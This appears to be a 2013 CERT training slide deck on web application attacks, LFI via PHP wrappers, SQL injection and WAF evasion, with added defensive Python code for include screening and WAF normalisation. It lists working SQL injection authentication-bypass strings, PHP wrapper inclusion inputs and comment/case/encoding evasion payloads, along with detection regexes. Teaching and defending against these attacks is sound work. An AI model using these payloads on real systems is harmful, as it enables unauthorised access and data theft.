Web Application Attacks And WAF Evasion...WAF Evasion (Web Application Firewall) Web application...

Web Application Attacks And WAF Evasion Ahmed ALaa (EG-CERT) 19 March 2013



Web Application Attacks And WAF Evasion

Ahmed ALaa (EG-CERT) 19 March 2013


What Are We Going To Talk About?

- Introduction to web attacks
- OWASP organization
- OWASP frameworks
- Crawling & info. gathering
- Vulnerability Assessment
- WAF evading


Introduction To Web Application Attacks


Server Side Attacks


OWASP The Open Web Application Security Project


OWASP Organization

The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.


OWASP Frameworks

These are deliberately vulnerable open source applications for practising vulnerability testing and for educational purposes, each offering several security levels to test against.

- DVWA (Damn Vulnerable Web Application)
- Mutillidae
- WebGoat


OWASP Top 10 Web App. Vuln. 2013

1. Injection
2. Broken Authentication and Session Management
3. Cross Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross Site Request Forgery (CSRF)
9. Using Known Vulnerable Components
10. Unvalidated Redirects and Forwards


Web Attacks Methods


Info Gathering Via Firefox Addons

Wappalyzer: a browser extension that uncovers the technologies used on websites. It detects content management systems, web shops, web servers, JavaScript frameworks, analytics tools and many more.

Domain Details: displays server type, headers, IP address, location flag, and links to Whois reports. Shows links to check server status and cache when a page fails to load.


Web Crawling By Burpsuite


Directory Enumeration By DirBuster


Brute Forcing Basic Authentication & Forms Via Firefox Addon Fireforce


Local File Inclusion (DVWA)


PHP Wrappers

A wrapper is additional code which tells the stream how to handle specific protocols/encodings. For example, the http wrapper knows how to translate a URL into an HTTP/1.0 request for a file on a remote server. There are many wrappers built into PHP by default:

- php://filter/convert.base64-encode/resource=include.php
- data://text/plain;base64,SSBsb3ZlIFBIUAo=
- php://input
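The wrappers listed above are also what an include parameter has to be screened for before it reaches `include()`. The following Python is an added example, not code from the slides or from PHP itself: a resolver that accepts only an allow-listed page name and refuses any value that carries a stream wrapper scheme (checked on the URL-decoded form, case-insensitively, as PHP treats `Php://` and `php://` alike), plus a helper that decodes a `data:` wrapper payload so a log reviewer can see what such a value carries. The page directory and the allow-list are assumptions made for the example.

```python
import base64
import posixpath
from urllib.parse import unquote

PAGES_DIR = "/var/www/app/pages"              # assumed location of includable pages
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed allow-list of page names


def wrapper_scheme(value):
    """Return the lower-cased stream wrapper scheme in an include value, or None.

    Works on the URL-decoded form so that 'php%3A%2F%2Finput' is caught too.
    """
    decoded = unquote(value).lstrip()
    head, sep, _ = decoded.partition(":")
    if not sep or not head or not head.isalpha():
        return None
    return head.lower()


def decode_data_wrapper(value):
    """Decode the payload of a data: wrapper value such as data://text/plain;base64,...

    Returns the decoded text, or None when the value is not a data: wrapper.
    """
    if wrapper_scheme(value) != "data":
        return None
    meta, sep, payload = unquote(value).partition(",")
    if not sep:
        return None
    if meta.lower().endswith(";base64"):
        return base64.b64decode(payload).decode("utf-8", errors="replace")
    return payload


def resolve_include(value):
    """Map a user-supplied page name to a file path, or None when it must be refused."""
    if wrapper_scheme(value) is not None:
        return None                      # php://, data://, http://, file: ... all refused
    if any(ch in value for ch in "/\\\x00") or ".." in value:
        return None                      # no traversal, no absolute paths, no NUL bytes
    if value not in ALLOWED_PAGES:
        return None                      # allow-list, never a deny-list
    return posixpath.join(PAGES_DIR, value + ".php")


if __name__ == "__main__":
    for candidate in ("home", "php://input",
                      "Data://text/plain;base64,SSBsb3ZlIFBIUAo=", "../../etc/passwd"):
        print(repr(candidate), "->", resolve_include(candidate),
              "| data payload:", repr(decode_data_wrapper(candidate)))
```

The allow-list is the important part: a deny-list of known wrapper names would miss any wrapper or traversal form not on the list, while mapping a short token to a fixed path leaves nothing for the request to control.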


SQL Injection Attacks

A poorly validated input field in a web form may allow an attacker to insert additional SQL instructions, which are then passed directly to the backend database. The attacker sends simple text-based attacks that exploit the syntax of the target interpreter.


SQL Injection Authentication Bypass


SQL Injection Authentication Bypass

Because the code performs no input validation, we can inject our own query to gain admin authentication:

- admin' -- -
- admin' and 1=1 -- -
- admin' or '1'='1
- admin' or 1=1 Limit 0,1 #
- ' or 1=1 -- -
- ' or 1=1 Limit 0,1 /*
- ' AND 1=0 UNION ALL SELECT 1,2,3 -- -


SQL Injection Types

- Union based injection
- Blind based injection
- Time based injection
- Error based injection
- Blind time based injection


Detecting SQL Injection Vulnerability

MySQL error:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 12

MSSQL error:

Server Error in '/' Application.
Unclosed quotation mark before the character string ';'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ';'.


SQL Injection Exploitation (prepare your lab)

- ORDER BY clause
- UNION statement
- user(), database(), version()
- information_schema
- Database structure
- substring & ascii


WAF Evasion (Web Application Firewall)

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload.

However, there are various methods for sneaking malicious requests that violate these rules past WAFs by modifying certain parts of their headers or the paths of requested URLs. These are known as protocol-level evasion techniques, and WAFs are not properly equipped to deal with them at the moment because the techniques are not very well documented.


WAF Evasion (Web Application Firewall)

- Detect WAF systems.
- Fingerprint WAF systems.
- Generic evasion techniques.


WAF Evasion Techniques

- SQL comments in parameters to try to defeat some SQL injection rules.
- Words in random case to try to defeat some SQL injection rules.
- SQL query encoding (for example: hex encoding via database features).
- URI encoding (for example: Unicode forward slash).


WAF Evasion Techniques (SQL inj.)

Comment:

- /*!*/
- /*!order*//**//*!by*/ 1--
- /*!union*//**//*!select*/ 1,2,3,4,5--

Case sensitive:

- /*!oRdEr*//**//*!bY*/ 1--
- /*!uNiOn*//**//*!sEleCt*/ 1,2,3,4,5--

Encoding:

- %2F*!uNiOn*%2F%2F**%2F%2F*!sEleCt*%2F%201%2C2%E2%80
- table_name=0xHEX to bypass a forbidden single quote '
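The two preceding slides list exactly the input forms a WAF or log-analysis rule has to canonicalise before matching, and they show why a rule that looks for the literal text `union select` fires on none of them. The following Python is an added example, not code from the slides or from any WAF product: a small normaliser (bounded repeated URL decoding, MySQL executable-comment unwrapping, ordinary comment stripping, whitespace folding, lowercasing) followed by a comparison of a naive keyword match with the normalised match on the slides' own payloads. The rule names and the hex literal are constructed for the example.

```python
import re
from urllib.parse import unquote

# /*! ... */ is a MySQL "executable comment": the server runs its contents, so the
# normaliser keeps the contents and drops only the delimiters (and an optional
# five-digit version number right after the '!').
MYSQL_EXEC_COMMENT = re.compile(r"/\*!\s*(?:\d{5})?(.*?)\*/", re.S)
# Ordinary /* ... */ comments carry nothing to the server and become a single space.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(value, max_rounds=3):
    """Bring a parameter value into the form the database would actually see."""
    s = value
    for _ in range(max_rounds):          # bounded repeated URL decoding (%252F -> %2F -> /)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = MYSQL_EXEC_COMMENT.sub(r" \1 ", s)   # /*!uNiOn*/ -> uNiOn
    s = PLAIN_COMMENT.sub(" ", s)            # /**/       -> space
    return re.sub(r"\s+", " ", s).strip().lower()


# Constructed detection rules; they are applied to the normalised value.
RULES = {
    "union-select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "order-by": re.compile(r"\border\s+by\b"),
    "hex-literal": re.compile(r"\b0x[0-9a-f]+\b"),
}


def match_rules(value, normalized=True):
    """Return the names of the rules that fire. normalized=False shows what a
    rule that matches the raw (only lower-cased) value would see."""
    s = normalize(value) if normalized else value.lower()
    return sorted(name for name, rx in RULES.items() if rx.search(s))


if __name__ == "__main__":
    samples = [
        "/*!uNiOn*//**//*!sEleCt*/ 1,2,3,4,5",
        "%2F*!uNiOn*%2F%2F**%2F%2F*!sEleCt*%2F%201%2C2",
        "/*!oRdEr*//**//*!bY*/ 1",
        "table_name=0x61646D696E",           # constructed hex literal
    ]
    for s in samples:
        print(repr(s), "raw:", match_rules(s, normalized=False),
              "normalised:", match_rules(s), "->", repr(normalize(s)))
```

The decoding loop is bounded on purpose: an unbounded decode can be driven into mismatches between what the WAF sees and what the application decodes, and the application's own decoding depth is the reference point to match. Version-comment handling should follow the backend actually deployed, since `/*! */` is a MySQL feature and means nothing to MSSQL.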


Questions ??!!!


Thank you

Contact: [email protected]